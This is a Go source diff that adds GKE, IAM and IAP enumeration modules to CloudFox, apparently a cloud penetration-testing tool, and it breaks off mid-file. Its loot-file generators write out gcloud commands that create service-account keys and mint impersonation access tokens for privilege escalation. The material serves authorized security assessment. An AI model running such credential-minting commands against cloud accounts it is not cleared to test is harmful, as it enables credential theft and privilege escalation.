+ } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_FUNCTIONS_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/gke.go b/gcp/commands/gke.go new file mode 100644 index 00000000..ebeb5599 --- /dev/null +++ b/gcp/commands/gke.go @@ -0,0 +1,342 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + GKEService "github.com/BishopFox/cloudfox/gcp/services/gkeService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPGKECommand = &cobra.Command{ + Use: globals.GCP_GKE_MODULE_NAME, + Aliases: []string{"kubernetes", "k8s", "clusters"}, + Short: "Enumerate GKE clusters with security analysis", + Long: `Enumerate GKE clusters across projects with comprehensive security analysis. + +Features: +- Lists all GKE clusters accessible to the authenticated user +- Analyzes security configuration (private clusters, authorized networks, RBAC) +- Identifies clusters with public API endpoints +- Shows workload identity configuration +- Detects common misconfigurations (legacy ABAC, basic auth, no network policy) +- Enumerates node pools with service accounts and OAuth scopes +- Shows Binary Authorization status +- Shows GKE Autopilot vs Standard mode +- Shows Config Connector and Istio/ASM status +- Shows maintenance window and exclusions +- Generates kubectl and gcloud commands for further analysis + +Security Columns: +- Private: Whether the cluster uses private nodes (no public IPs) +- MasterAuth: Master authorized networks enabled +- NetworkPolicy: Kubernetes network policy controller enabled +- WorkloadIdentity: GKE Workload Identity configured +- ShieldedNodes: Shielded GKE nodes enabled +- BinAuth: Binary Authorization enabled +- Autopilot: GKE Autopilot mode (vs Standard) +- Issues: Detected security misconfigurations + +Attack Surface: +- Public API servers are accessible from the internet +- Clusters without Workload Identity use node service accounts +- Default service accounts may have excessive permissions +- Legacy ABAC allows broader access than RBAC +- Autopilot clusters have reduced attack surface +- Binary Authorization prevents untrusted container images`, + Run: runGCPGKECommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type GKEModule struct { + gcpinternal.BaseGCPModule + + Clusters []GKEService.ClusterInfo + NodePools []GKEService.NodePoolInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type GKEOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o GKEOutput) TableFiles() []internal.TableFile { return o.Table } +func (o GKEOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPGKECommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_GKE_MODULE_NAME) + if err != nil { + return + } + + module := &GKEModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Clusters: []GKEService.ClusterInfo{}, + NodePools: []GKEService.NodePoolInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *GKEModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_GKE_MODULE_NAME, m.processProject) + + if len(m.Clusters) == 0 { + logger.InfoM("No GKE clusters found", globals.GCP_GKE_MODULE_NAME) + return + } + + // Count public clusters + publicCount := 0 + for _, cluster := range m.Clusters { + if !cluster.PrivateCluster && !cluster.MasterAuthorizedOnly { + publicCount++ + } + } + + msg := fmt.Sprintf("Found %d cluster(s), %d node pool(s)", len(m.Clusters), len(m.NodePools)) + if publicCount > 0 { + msg += fmt.Sprintf(" [%d with public API endpoint]", publicCount) + } + logger.SuccessM(msg, globals.GCP_GKE_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *GKEModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating GKE clusters in project: %s", projectID), globals.GCP_GKE_MODULE_NAME) + } + + gs := GKEService.New() + clusters, nodePools, err := gs.Clusters(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_GKE_MODULE_NAME, + fmt.Sprintf("Could not enumerate GKE clusters in project %s", projectID)) + return + } + + m.mu.Lock() + m.Clusters = append(m.Clusters, clusters...) + m.NodePools = append(m.NodePools, nodePools...) + + for _, cluster := range clusters { + m.addClusterToLoot(cluster) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d cluster(s) in project %s", len(clusters), projectID), globals.GCP_GKE_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *GKEModule) initializeLootFiles() { + m.LootMap["gke-commands"] = &internal.LootFile{ + Name: "gke-commands", + Contents: "# GKE Commands\n# Generated by CloudFox\n\n", + } +} + +func (m *GKEModule) addClusterToLoot(cluster GKEService.ClusterInfo) { + m.LootMap["gke-commands"].Contents += fmt.Sprintf( + "# Cluster: %s (%s)\n"+ + "# Project: %s\n"+ + "gcloud container clusters describe %s --location=%s --project=%s\n"+ + "gcloud container clusters get-credentials %s --location=%s --project=%s\n"+ + "gcloud container node-pools list --cluster=%s --location=%s --project=%s\n\n"+ + "# kubectl commands (after getting credentials):\n"+ + "kubectl cluster-info\n"+ + "kubectl get nodes -o wide\n"+ + "kubectl get namespaces\n"+ + "kubectl auth can-i --list\n\n", + cluster.Name, cluster.Location, + cluster.ProjectID, + cluster.Name, cluster.Location, cluster.ProjectID, + cluster.Name, cluster.Location, cluster.ProjectID, + cluster.Name, cluster.Location, cluster.ProjectID, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *GKEModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Clusters table - merged with config columns, removed Issues + clusterHeader := []string{ + "Project Name", + "Project ID", + "Name", + "Location", + "Endpoint", + "Status", + "Version", + "Mode", + "Private", + "MasterAuth", + "NetPolicy", + "WorkloadID", + "Shielded", + "BinAuth", + "Release Channel", + "ConfigConnector", + } + + var clusterBody [][]string + for _, cluster := range m.Clusters { + // Cluster mode + clusterMode := "Standard" + if cluster.Autopilot { + clusterMode = "Autopilot" + } + + // Release channel + releaseChannel := cluster.ReleaseChannel + if releaseChannel == "" || releaseChannel == "UNSPECIFIED" { + releaseChannel = "-" + } + + // Endpoint display + endpoint := cluster.Endpoint + if endpoint == "" { + endpoint = "-" + } + + clusterBody = append(clusterBody, []string{ + m.GetProjectName(cluster.ProjectID), + cluster.ProjectID, + cluster.Name, + cluster.Location, + endpoint, + cluster.Status, + cluster.CurrentMasterVersion, + clusterMode, + boolToYesNo(cluster.PrivateCluster), + boolToYesNo(cluster.MasterAuthorizedOnly), + boolToYesNo(cluster.NetworkPolicy), + boolToYesNo(cluster.WorkloadIdentity != ""), + boolToYesNo(cluster.ShieldedNodes), + boolToYesNo(cluster.BinaryAuthorization), + releaseChannel, + boolToYesNo(cluster.ConfigConnector), + }) + } + + // Node pools table - no truncation on service account, added Cloud Platform Scope column + nodePoolHeader := []string{ + "Project Name", + "Project ID", + "Cluster", + "Node Pool", + "Machine Type", + "Node Count", + "Service Account", + "Cloud Platform Scope", + "Auto Upgrade", + "Secure Boot", + "Preemptible", + } + + var nodePoolBody [][]string + for _, np := range m.NodePools { + // No truncation on service account + saDisplay := np.ServiceAccount + if saDisplay == "" { + saDisplay = "-" + } + + nodePoolBody = append(nodePoolBody, []string{ + m.GetProjectName(np.ProjectID), + np.ProjectID, + np.ClusterName, + np.Name, + np.MachineType, + fmt.Sprintf("%d", np.NodeCount), + saDisplay, + boolToYesNo(np.HasCloudPlatformScope), + boolToYesNo(np.AutoUpgrade), + boolToYesNo(np.SecureBoot), + boolToYesNo(np.Preemptible || np.Spot), + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build table files - only 2 tables now + tableFiles := []internal.TableFile{} + + if len(clusterBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "gke-clusters", + Header: clusterHeader, + Body: clusterBody, + }) + } + + if len(nodePoolBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "gke-node-pools", + Header: nodePoolHeader, + Body: nodePoolBody, + }) + } + + output := GKEOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_GKE_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/iam.go b/gcp/commands/iam.go index 4c8b3139..3d8d8bc6 100644 --- a/gcp/commands/iam.go +++ b/gcp/commands/iam.go @@ -1,122 +1,685 @@ package commands import ( + "context" "fmt" + "strings" + "sync" IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/spf13/cobra" ) var GCPIAMCommand = &cobra.Command{ Use: globals.GCP_IAM_MODULE_NAME, - Aliases: []string{}, - Short: "Display GCP IAM information", - Args: cobra.MinimumNArgs(0), - Long: ` -Display IAM principals and their roles information within GCP resources: -cloudfox gcp iam`, + Aliases: []string{"roles"}, + Short: "Enumerate GCP IAM principals across organizations, folders, and projects", + Long: `Enumerate GCP IAM principals and their role bindings across the entire hierarchy. + +Features: +- Enumerates IAM bindings at organization, folder, and project levels +- Shows role assignments per principal with scope information +- Enumerates service accounts with key information +- Lists custom roles with their permissions +- Identifies groups and their role assignments +- Detects high-privilege roles and public access +- Shows conditional IAM policies with details +- Attempts to retrieve MFA status for users (requires Admin SDK) +- Generates gcloud commands for privilege escalation testing`, Run: runGCPIAMCommand, } -// Results struct for IAM command that implements the internal.OutputInterface -type GCPIAMResults struct { - Data []IAMService.PrincipalWithRoles +// High-privilege roles that should be flagged +var highPrivilegeRoles = map[string]bool{ + // Owner/Editor + "roles/owner": true, + "roles/editor": true, + // IAM Admin roles + "roles/iam.securityAdmin": true, + "roles/iam.serviceAccountAdmin": true, + "roles/iam.serviceAccountKeyAdmin": true, + "roles/iam.serviceAccountTokenCreator": true, + "roles/iam.serviceAccountUser": true, + "roles/iam.workloadIdentityUser": true, + "roles/iam.roleAdmin": true, + // Resource Manager roles + "roles/resourcemanager.projectIamAdmin": true, + "roles/resourcemanager.folderAdmin": true, + "roles/resourcemanager.folderIamAdmin": true, + "roles/resourcemanager.organizationAdmin": true, + // Compute roles + "roles/compute.admin": true, + "roles/compute.instanceAdmin": true, + "roles/compute.osAdminLogin": true, + // Storage roles + "roles/storage.admin": true, + // Functions/Run roles + "roles/cloudfunctions.admin": true, + "roles/cloudfunctions.developer": true, + "roles/run.admin": true, + "roles/run.developer": true, + // Secret Manager + "roles/secretmanager.admin": true, + // Container/Kubernetes + "roles/container.admin": true, + "roles/container.clusterAdmin": true, + // BigQuery + "roles/bigquery.admin": true, + // Deployment Manager + "roles/deploymentmanager.editor": true, + // Cloud Build + "roles/cloudbuild.builds.editor": true, + // Service Usage + "roles/serviceusage.serviceUsageAdmin": true, + // Org Policy + "roles/orgpolicy.policyAdmin": true, +} + +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type IAMModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields - using enhanced data + ScopeBindings []IAMService.ScopeBinding + ServiceAccounts []IAMService.ServiceAccountInfo + CustomRoles []IAMService.CustomRole + Groups []IAMService.GroupInfo + MFAStatus map[string]*IAMService.MFAStatus + LootMap map[string]*internal.LootFile + mu sync.Mutex + + // Member to groups mapping (email -> list of group emails) + MemberToGroups map[string][]string + + // Organization info for output path + OrgIDs []string + OrgNames map[string]string +} + +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type IAMOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o IAMOutput) TableFiles() []internal.TableFile { return o.Table } +func (o IAMOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPIAMCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_IAM_MODULE_NAME) + if err != nil { + return // Error already logged + } + + // Create module instance + module := &IAMModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ScopeBindings: []IAMService.ScopeBinding{}, + ServiceAccounts: []IAMService.ServiceAccountInfo{}, + CustomRoles: []IAMService.CustomRole{}, + Groups: []IAMService.GroupInfo{}, + MFAStatus: make(map[string]*IAMService.MFAStatus), + LootMap: make(map[string]*internal.LootFile), + MemberToGroups: make(map[string][]string), + OrgIDs: []string{}, + OrgNames: make(map[string]string), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *IAMModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Enumerating IAM across organizations, folders, and projects...", globals.GCP_IAM_MODULE_NAME) + + // Use the enhanced IAM enumeration + iamService := IAMService.New() + iamData, err := iamService.CombinedIAMEnhanced(ctx, m.ProjectIDs, m.ProjectNames) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, "Failed to enumerate IAM") + return + } + + m.ScopeBindings = iamData.ScopeBindings + m.ServiceAccounts = iamData.ServiceAccounts + m.CustomRoles = iamData.CustomRoles + m.Groups = iamData.Groups + m.MFAStatus = iamData.MFAStatus + + // Try to enumerate group memberships to build reverse lookup + enrichedGroups := iamService.GetGroupMemberships(ctx, m.Groups) + m.Groups = enrichedGroups + + // Build member-to-groups reverse mapping + for _, group := range enrichedGroups { + if group.MembershipEnumerated { + for _, member := range group.Members { + if member.Email != "" { + m.MemberToGroups[member.Email] = append(m.MemberToGroups[member.Email], group.Email) + } + } + } + } + + // Generate loot + m.generateLoot() + + // Count scopes and track org IDs + orgCount, folderCount, projectCount := 0, 0, 0 + scopeSeen := make(map[string]bool) + for _, sb := range m.ScopeBindings { + key := sb.ScopeType + ":" + sb.ScopeID + if !scopeSeen[key] { + scopeSeen[key] = true + switch sb.ScopeType { + case "organization": + orgCount++ + m.OrgIDs = append(m.OrgIDs, sb.ScopeID) + m.OrgNames[sb.ScopeID] = sb.ScopeName + case "folder": + folderCount++ + case "project": + projectCount++ + } + } + } + + logger.SuccessM(fmt.Sprintf("Found %d binding(s) across %d org(s), %d folder(s), %d project(s); %d SA(s), %d custom role(s), %d group(s)", + len(m.ScopeBindings), orgCount, folderCount, projectCount, + len(m.ServiceAccounts), len(m.CustomRoles), len(m.Groups)), globals.GCP_IAM_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *IAMModule) initializeLootFiles() { + m.LootMap["iam-commands"] = &internal.LootFile{ + Name: "iam-commands", + Contents: "# GCP IAM Commands\n# Generated by CloudFox\n\n", + } +} + +func (m *IAMModule) generateLoot() { + // Track unique service accounts we've seen + sasSeen := make(map[string]bool) + + for _, sb := range m.ScopeBindings { + if sb.MemberType != "ServiceAccount" { + continue + } + if sasSeen[sb.MemberEmail] { + continue + } + sasSeen[sb.MemberEmail] = true + + // Check for high privilege roles + isHighPriv := highPrivilegeRoles[sb.Role] + + if isHighPriv { + m.LootMap["iam-commands"].Contents += fmt.Sprintf( + "# Service Account: %s [HIGH PRIVILEGE] (%s)\n", + sb.MemberEmail, sb.Role, + ) + } else { + m.LootMap["iam-commands"].Contents += fmt.Sprintf( + "# Service Account: %s\n", + sb.MemberEmail, + ) + } + + // Use project scope if available, otherwise use first project + projectID := sb.ScopeID + if sb.ScopeType != "project" && len(m.ProjectIDs) > 0 { + projectID = m.ProjectIDs[0] + } + + m.LootMap["iam-commands"].Contents += fmt.Sprintf( + "gcloud iam service-accounts describe %s --project=%s\n"+ + "gcloud iam service-accounts keys list --iam-account=%s --project=%s\n"+ + "gcloud iam service-accounts get-iam-policy %s --project=%s\n"+ + "gcloud iam service-accounts keys create ./key.json --iam-account=%s --project=%s\n"+ + "gcloud auth print-access-token --impersonate-service-account=%s\n\n", + sb.MemberEmail, projectID, + sb.MemberEmail, projectID, + sb.MemberEmail, projectID, + sb.MemberEmail, projectID, + sb.MemberEmail, + ) + } + + // Add service accounts with keys + for _, sa := range m.ServiceAccounts { + if sa.HasKeys { + m.LootMap["iam-commands"].Contents += fmt.Sprintf( + "# Service Account with Keys: %s (Keys: %d)\n"+ + "gcloud iam service-accounts keys list --iam-account=%s --project=%s\n\n", + sa.Email, sa.KeyCount, sa.Email, sa.ProjectID, + ) + } + } + + // Add custom roles + for _, role := range m.CustomRoles { + m.LootMap["iam-commands"].Contents += fmt.Sprintf( + "# Custom Role: %s (%d permissions)\n"+ + "gcloud iam roles describe %s --project=%s\n\n", + role.Title, role.PermissionCount, + extractRoleName(role.Name), role.ProjectID, + ) + } +} + +// extractRoleName extracts the role name from full path +func extractRoleName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +// FederatedIdentityInfo contains parsed information about a federated identity +type FederatedIdentityInfo struct { + IsFederated bool + ProviderType string // AWS, GitHub, GitLab, OIDC, SAML, Azure, etc. + PoolName string + Subject string + Attribute string +} + +// parseFederatedIdentity detects and parses federated identity principals +// Federated identities use principal:// or principalSet:// format +func parseFederatedIdentity(identity string) FederatedIdentityInfo { + info := FederatedIdentityInfo{} + + // Check for principal:// or principalSet:// format + if !strings.HasPrefix(identity, "principal://") && !strings.HasPrefix(identity, "principalSet://") { + return info + } + + info.IsFederated = true + + // Parse the principal URL + // Format: principal://iam.googleapis.com/projects/{project}/locations/global/workloadIdentityPools/{pool}/subject/{subject} + // Or: principalSet://iam.googleapis.com/projects/{project}/locations/global/workloadIdentityPools/{pool}/attribute.{attr}/{value} + + // Extract pool name if present + if strings.Contains(identity, "workloadIdentityPools/") { + parts := strings.Split(identity, "workloadIdentityPools/") + if len(parts) > 1 { + poolParts := strings.Split(parts[1], "/") + if len(poolParts) > 0 { + info.PoolName = poolParts[0] + } + } + } + + // Detect provider type based on common patterns in pool names and attributes + identityLower := strings.ToLower(identity) + + switch { + case strings.Contains(identityLower, "aws") || strings.Contains(identityLower, "amazon"): + info.ProviderType = "AWS" + case strings.Contains(identityLower, "github"): + info.ProviderType = "GitHub" + case strings.Contains(identityLower, "gitlab"): + info.ProviderType = "GitLab" + case strings.Contains(identityLower, "azure") || strings.Contains(identityLower, "microsoft"): + info.ProviderType = "Azure" + case strings.Contains(identityLower, "okta"): + info.ProviderType = "Okta" + case strings.Contains(identityLower, "bitbucket"): + info.ProviderType = "Bitbucket" + case strings.Contains(identityLower, "circleci"): + info.ProviderType = "CircleCI" + case strings.Contains(identity, "attribute."): + // Has OIDC attributes but unknown provider + info.ProviderType = "OIDC" + case strings.Contains(identity, "/subject/"): + // Has subject but unknown provider type + info.ProviderType = "Federated" + default: + info.ProviderType = "Federated" + } + + // Extract subject if present + if strings.Contains(identity, "/subject/") { + parts := strings.Split(identity, "/subject/") + if len(parts) > 1 { + info.Subject = parts[1] + } + } + + // Extract attribute and value if present + // Format: .../attribute.{attr}/{value} + if strings.Contains(identity, "/attribute.") { + parts := strings.Split(identity, "/attribute.") + if len(parts) > 1 { + attrParts := strings.Split(parts[1], "/") + if len(attrParts) >= 1 { + info.Attribute = attrParts[0] + } + if len(attrParts) >= 2 { + // The value is the specific identity (e.g., repo name) + info.Subject = attrParts[1] + } + } + } + + return info +} + +// formatFederatedInfo formats federated identity info for display +func formatFederatedInfo(info FederatedIdentityInfo) string { + if !info.IsFederated { + return "-" + } + + result := info.ProviderType + + // Show subject (specific identity like repo/workflow) if available + if info.Subject != "" { + result += ": " + info.Subject + } else if info.Attribute != "" { + result += " [" + info.Attribute + "]" + } + + // Add pool name in parentheses + if info.PoolName != "" { + result += " (pool: " + info.PoolName + ")" + } + + return result } -// TableFiles formats the data for table output, CSV & JSON files -func (g GCPIAMResults) TableFiles() []internal.TableFile { - var tableFiles []internal.TableFile +// formatCondition formats a condition for display +func formatCondition(condInfo *IAMService.IAMCondition) string { + if condInfo == nil { + return "No" + } + // Build a meaningful condition summary + parts := []string{} + + if condInfo.Title != "" { + parts = append(parts, condInfo.Title) + } + + // Parse common condition patterns from expression + expr := condInfo.Expression + if expr != "" { + // Check for time-based conditions + if strings.Contains(expr, "request.time") { + if strings.Contains(expr, "timestamp") { + parts = append(parts, "[time-limited]") + } + } + // Check for resource-based conditions + if strings.Contains(expr, "resource.name") { + parts = append(parts, "[resource-scoped]") + } + // Check for IP-based conditions + if strings.Contains(expr, "origin.ip") || strings.Contains(expr, "request.origin") { + parts = append(parts, "[IP-restricted]") + } + // Check for device policy + if strings.Contains(expr, "device") { + parts = append(parts, "[device-policy]") + } + } + + if len(parts) == 0 { + return "Yes" + } + + return strings.Join(parts, " ") +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *IAMModule) writeOutput(ctx context.Context, logger internal.Logger) { + // New table structure with Scope Type/ID/Name header := []string{ - "Name", - "Principal Type", + "Scope Type", + "Scope ID", + "Scope Name", + "Entry Type", + "Identity", "Role", - "PolicyResourceType", - "PolicyResourceID", + "High Privilege", + "Custom Role", + "Has Keys", + "Condition", + "MFA", + "Groups", + "Federated", } var body [][]string + publicAccessFound := false + saWithKeys := 0 + highPrivCount := 0 + + // Add scope bindings (one row per binding) + for _, sb := range m.ScopeBindings { + isHighPriv := "No" + if highPrivilegeRoles[sb.Role] { + isHighPriv = "Yes" + highPrivCount++ + } + + isCustom := "No" + if sb.IsCustom { + isCustom = "Yes" + } - for _, principal := range g.Data { - for _, binding := range principal.PolicyBindings { - body = append(body, []string{ - principal.Name, - principal.Type, - binding.Role, - principal.ResourceType, - principal.ResourceID, - }) + // Format condition + condition := "No" + if sb.HasCondition { + condition = formatCondition(sb.ConditionInfo) } + + // Check for public access + if sb.MemberType == "PUBLIC" || sb.MemberType == "ALL_AUTHENTICATED" { + publicAccessFound = true + } + + // Get MFA status + mfa := "-" + if sb.MemberType == "User" { + if status, ok := m.MFAStatus[sb.MemberEmail]; ok { + if status.Error != "" { + mfa = "Unknown" + } else if status.HasMFA { + mfa = "Yes" + } else { + mfa = "No" + } + } + } else if sb.MemberType == "ServiceAccount" { + mfa = "N/A" + } + + // Get groups this member belongs to + groups := "-" + if memberGroups, ok := m.MemberToGroups[sb.MemberEmail]; ok && len(memberGroups) > 0 { + groups = strings.Join(memberGroups, ", ") + } + + // Check for federated identity + federated := formatFederatedInfo(parseFederatedIdentity(sb.MemberEmail)) + + body = append(body, []string{ + sb.ScopeType, + sb.ScopeID, + sb.ScopeName, + sb.MemberType, + sb.MemberEmail, + sb.Role, + isHighPriv, + isCustom, + "-", + condition, + mfa, + groups, + federated, + }) } - tableFile := internal.TableFile{ - Header: header, - Body: body, - Name: globals.GCP_IAM_MODULE_NAME, + // Add service accounts + for _, sa := range m.ServiceAccounts { + hasKeys := "No" + if sa.HasKeys { + hasKeys = "Yes" + saWithKeys++ + } + + disabled := "" + if sa.Disabled { + disabled = " (disabled)" + } + + // Get groups this SA belongs to + groups := "-" + if memberGroups, ok := m.MemberToGroups[sa.Email]; ok && len(memberGroups) > 0 { + groups = strings.Join(memberGroups, ", ") + } + + body = append(body, []string{ + "project", + sa.ProjectID, + m.GetProjectName(sa.ProjectID), + "ServiceAccountInfo", + sa.Email + disabled, + sa.DisplayName, + "-", + "-", + hasKeys, + "-", + "N/A", + groups, + "-", // Service accounts are not federated identities + }) } - tableFiles = append(tableFiles, tableFile) - return tableFiles -} + // Add custom roles + for _, role := range m.CustomRoles { + deleted := "" + if role.Deleted { + deleted = " (deleted)" + } -// LootFiles can be implemented if needed -func (g GCPIAMResults) LootFiles() []internal.LootFile { - return []internal.LootFile{} -} + body = append(body, []string{ + "project", + role.ProjectID, + m.GetProjectName(role.ProjectID), + "CustomRole", + extractRoleName(role.Name) + deleted, + fmt.Sprintf("%s (%d permissions)", role.Title, role.PermissionCount), + "-", + "Yes", + "-", + "-", + "-", + "-", + "-", // Custom roles are not federated identities + }) + } -// Houses high-level logic that retrieves IAM information and writes to output -func runGCPIAMCommand(cmd *cobra.Command, args []string) { - // Retrieve projectIDs and resource type from parent (gcp command) ctx - var projectIDs []string - var resourceType string - var account string - parentCmd := cmd.Parent() - ctx := cmd.Context() - logger := internal.NewLogger() - if value, ok := ctx.Value("projectIDs").([]string); ok && len(value) > 0 { - projectIDs = value - } else { - logger.ErrorM("Could not retrieve projectIDs from flag value or value is empty", globals.GCP_IAM_MODULE_NAME) - return + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } } - if value, ok := ctx.Value("account").(string); ok { - account = value - } else { - logger.ErrorM("Could not retrieve account email from command", globals.GCP_IAM_MODULE_NAME) + // Build tables + tables := []internal.TableFile{ + { + Name: "iam", + Header: header, + Body: body, + }, } - // TODO fix once folders or organizations are supported as input for project root - resourceType = "project" + // Log warnings for security findings + if publicAccessFound { + logger.InfoM("[FINDING] Public access (allUsers/allAuthenticatedUsers) detected in IAM bindings!", globals.GCP_IAM_MODULE_NAME) + } + if saWithKeys > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d service account(s) with user-managed keys!", saWithKeys), globals.GCP_IAM_MODULE_NAME) + } + if highPrivCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d high-privilege role binding(s)!", highPrivCount), globals.GCP_IAM_MODULE_NAME) + } - // Initialize IAMService and fetch principals with roles for the given projectIDs and resource type - iamService := IAMService.New() - var results []IAMService.PrincipalWithRoles - - // Set output params leveraging parent (gcp) pflag values - verbosity, _ := parentCmd.PersistentFlags().GetInt("verbosity") - wrap, _ := parentCmd.PersistentFlags().GetBool("wrap") - outputDirectory, _ := parentCmd.PersistentFlags().GetString("outdir") - format, _ := parentCmd.PersistentFlags().GetString("output") - - for _, projectID := range projectIDs { - logger.InfoM(fmt.Sprintf("Retrieving IAM information for resource: %s of type %s", projectID, resourceType), globals.GCP_IAM_MODULE_NAME) - principals, err := iamService.PrincipalsWithRoles(projectID, resourceType) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_IAM_MODULE_NAME) - return - } - results = append(results, principals...) - logger.InfoM(fmt.Sprintf("Done retrieving IAM information for resource: %s of type %s", projectID, resourceType), globals.GCP_IAM_MODULE_NAME) - cloudfoxOutput := GCPIAMResults{Data: results} - - err = internal.HandleOutput("gcp", format, outputDirectory, verbosity, wrap, globals.GCP_IAM_MODULE_NAME, account, projectID, cloudfoxOutput) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_IAM_MODULE_NAME) - return - } - logger.InfoM(fmt.Sprintf("Done writing output for project %s", projectID), globals.GCP_IAM_MODULE_NAME) + output := IAMOutput{ + Table: tables, + Loot: lootFiles, + } + + // Determine output scope - use org if available, otherwise fall back to project + var scopeType string + var scopeIdentifiers []string + var scopeNames []string + + if len(m.OrgIDs) > 0 { + // Use organization scope with [O] prefix format + scopeType = "organization" + for _, orgID := range m.OrgIDs { + scopeIdentifiers = append(scopeIdentifiers, orgID) + if name, ok := m.OrgNames[orgID]; ok && name != "" { + scopeNames = append(scopeNames, name) + } else { + scopeNames = append(scopeNames, orgID) + } + } + } else { + // Fall back to project scope + scopeType = "project" + scopeIdentifiers = m.ProjectIDs + for _, id := range m.ProjectIDs { + scopeNames = append(scopeNames, m.GetProjectName(id)) + } + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + scopeType, + scopeIdentifiers, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_IAM_MODULE_NAME) + m.CommandCounter.Error++ } } diff --git a/gcp/commands/iap.go b/gcp/commands/iap.go new file mode 100644 index 00000000..2d33a1fe --- /dev/null +++ b/gcp/commands/iap.go @@ -0,0 +1,203 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + iapservice "github.com/BishopFox/cloudfox/gcp/services/iapService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPIAPCommand = &cobra.Command{ + Use: globals.GCP_IAP_MODULE_NAME, + Aliases: []string{"identity-aware-proxy"}, + Short: "Enumerate Identity-Aware Proxy configurations", + Long: `Enumerate Identity-Aware Proxy (IAP) configurations. + +Features: +- Lists IAP tunnel destination groups +- Analyzes IAP 